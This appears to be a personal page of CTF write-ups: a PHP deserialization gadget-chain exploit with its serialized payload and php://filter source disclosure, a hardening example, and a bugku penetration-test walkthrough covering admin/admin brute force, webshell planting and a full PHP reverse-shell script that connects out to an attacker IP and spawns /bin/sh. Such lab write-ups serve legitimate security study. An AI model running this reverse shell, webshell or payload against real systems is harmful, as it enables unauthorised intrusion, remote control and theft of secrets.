web

A place to keep notes.

web-033 is still being updated; this page is reserved for the other challenges.

Web-unse

Original information

The challenge source is as follows:

<?php
include("./test.php");
if(isset($_GET['fun'])){
    if(justafun($_GET['fun'])){
        include($_GET['fun']);
    }
}else{
    unserialize($_GET['yourcode']);
}
highlight_file(__FILE__);
?>

Solution

Try attacking with a pseudo-protocol (the php://filter stream wrapper) to read the included file as base64:

?fun=php://filter/read=convert.base64-encode/resource=test.php

File contents obtained (decoded):

<?php
$test = "Hello world";

include "flag.php";


function justafun($filename){
    $result = preg_match("/flag|zlib|string/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class afun {
    private $a;
    function __wakeup(){
        $temp = $this->a . 'ctf';
    }
}

class bfun {
    private $items = array();
    public function __toString() {
        $item = $this->items;
        $str = $item['dd']->knife;
        return 'what the good?';
    }
}

class cfun {
    private $params = array();
    public function __get($key) {
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp);
    }
}

Rewrite the classes and generate the payload (the chain is __wakeup -> string concatenation -> __toString -> undefined property read -> __get -> var_dump($$tmp) with $tmp = 'flag'):

<?php
class afun
{
    public $a;
    public function __construct()
    {
        $this->a = new bfun();
    }

    function __wakeup()
    {
        $temp = $this->a . 'ctf';
    }
}

class bfun
{
    public $items;
    public function __construct()
    {
        $this->items = array('dd' => new cfun());
    }
    public function __toString()
    {
        $item = $this->items;
        $str = $item['dd']->knife;
        return 'what the good?';
    }
}
class cfun
{
    public $params;
    public function __construct()
    {
        $this->params = array('knife' => 'flag');
    }

    public function __get($key)
    {
        global $flag;
        $tmp = $this->params[$key];
        var_dump($flag);
        var_dump($params);
        var_dump($$tmp);
    }
}

$b = new afun();
echo urlencode(serialize($b));

The output obtained is as follows:

?fun=O%3A4%3A%22afun%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A5%3A%22items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A6%3A%22params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D

Put it in the URL as the yourcode parameter and visit it to get the flag:

?yourcode=O%3A4%3A%22afun%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A4%3A%22bfun%22%3A1%3A%7Bs%3A5%3A%22items%22%3Ba%3A1%3A%7Bs%3A2%3A%22dd%22%3BO%3A4%3A%22cfun%22%3A1%3A%7Bs%3A6%3A%22params%22%3Ba%3A1%3A%7Bs%3A5%3A%22knife%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D
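As an added example (not part of the original writeup or the challenge's own code), the following PHP script reproduces the gadget chain from test.php locally and then shows the two hardening changes this challenge illustrates: refusing to instantiate classes from untrusted input, and replacing the keyword denylist that php://filter slipped past with an exact-match allowlist. The class names and the 'flag' key come from the challenge; the value of $flag, the allowlist contents and the helper names safeUnserialize() and resolveInclude() are constructed here.

```php
<?php
// Added example (not part of the original writeup): reproduces the gadget chain
// from test.php locally, then shows two hardening changes. Class names and the
// 'flag' key come from the challenge; $flag's value, the allowlist and the helper
// names safeUnserialize() / resolveInclude() are constructed for this example.

$flag = 'flag{constructed_sample_value}'; // stand-in for what flag.php defines

class afun {
    public $a;
    function __wakeup() {
        // Concatenating an object with a string calls bfun::__toString()
        $temp = $this->a . 'ctf';
    }
}

class bfun {
    public $items = array();
    public function __toString() {
        $item = $this->items;
        // 'knife' is not a declared property of cfun, so cfun::__get('knife') runs
        $str = $item['dd']->knife;
        return 'what the good?';
    }
}

class cfun {
    public $params = array();
    public function __get($key) {
        global $flag;
        $tmp = $this->params[$key]; // 'flag'
        var_dump($$tmp);            // variable variable: var_dump($flag)
    }
}

// Serialized form of afun(bfun(cfun(params: knife => flag))), as in the writeup
$payload = 'O:4:"afun":1:{s:1:"a";O:4:"bfun":1:{s:5:"items";a:1:{s:2:"dd";'
         . 'O:4:"cfun":1:{s:6:"params";a:1:{s:5:"knife";s:4:"flag";}}}}}';

// 1. As shipped: unserialize() instantiates attacker-chosen classes, and
//    __wakeup -> __toString -> __get -> var_dump($flag) leaks the flag.
echo "--- default unserialize() ---\n";
unserialize($payload);

// 2. Hardened: allowed_classes => false turns every object in the input into
//    __PHP_Incomplete_Class, so no magic method of afun/bfun/cfun ever runs.
function safeUnserialize($data) {
    return unserialize($data, array('allowed_classes' => false));
}
echo "--- allowed_classes => false ---\n";
var_dump(get_class(safeUnserialize($payload))); // "__PHP_Incomplete_Class"

// 3. Hardened include: a denylist such as /flag|zlib|string/i still lets
//    php://filter/... through; an exact-match allowlist of file names does not.
function resolveInclude($name) {
    $allowed = array('test.php', 'help.php'); // constructed allowlist
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    return __DIR__ . '/' . $name;
}
var_dump(resolveInclude('php://filter/read=convert.base64-encode/resource=test.php')); // NULL
var_dump(resolveInclude('test.php')); // the path under __DIR__
```

Run it with the PHP CLI: the first section prints the constructed flag, the second prints "__PHP_Incomplete_Class" because no object was instantiated, and resolveInclude() returns NULL for the wrapper URL. The point of the allowlist is that it matches the whole value, so no keyword filter has to anticipate every wrapper or encoding.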

Reference: https://blog.csdn.net/qq_42181428/article/details/87090539

bugku - rip - Penetration Test 1

Original information

A website.

Solution

flag1

First flag: after visiting the site, view the page source and search for "flag".

flag2

Second flag: the end of the previous flag hints that the next flag is on the admin page. Try visiting the admin page /admin; a weak-password brute force yields the credentials admin/admin, and the flag turns up while browsing around.

flag3

It also hints at /home.

In the backend there is a PHP learning site that executes PHP directly, so try writing a shell.

After writing it, connect with 菜刀 (Caidao) directly, change to the home directory, and find the flag:

New hint: root and database

flag4

The hint says to do something with the database.

Caidao somehow would not work, so test the connection with 蚁剑 (AntSword):

After connecting and getting the flag, the new hint says to use nc to get through the pwn; give nc a try:

flag5

Originally I wanted to use nc to get a reverse shell, but now it looks like another approach is needed.

This is a script from some blogger:

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '1.12.x.x'; // CHANGE THIS
$port = 4567; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w")  // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>

The pwn challenge is hard; skip it for now.

flag6

Port scan, then probe each open port for its corresponding sensitive files.

Scan the ports with nmap:

Scan for sensitive files with a tool:

Visit the result and get the flag: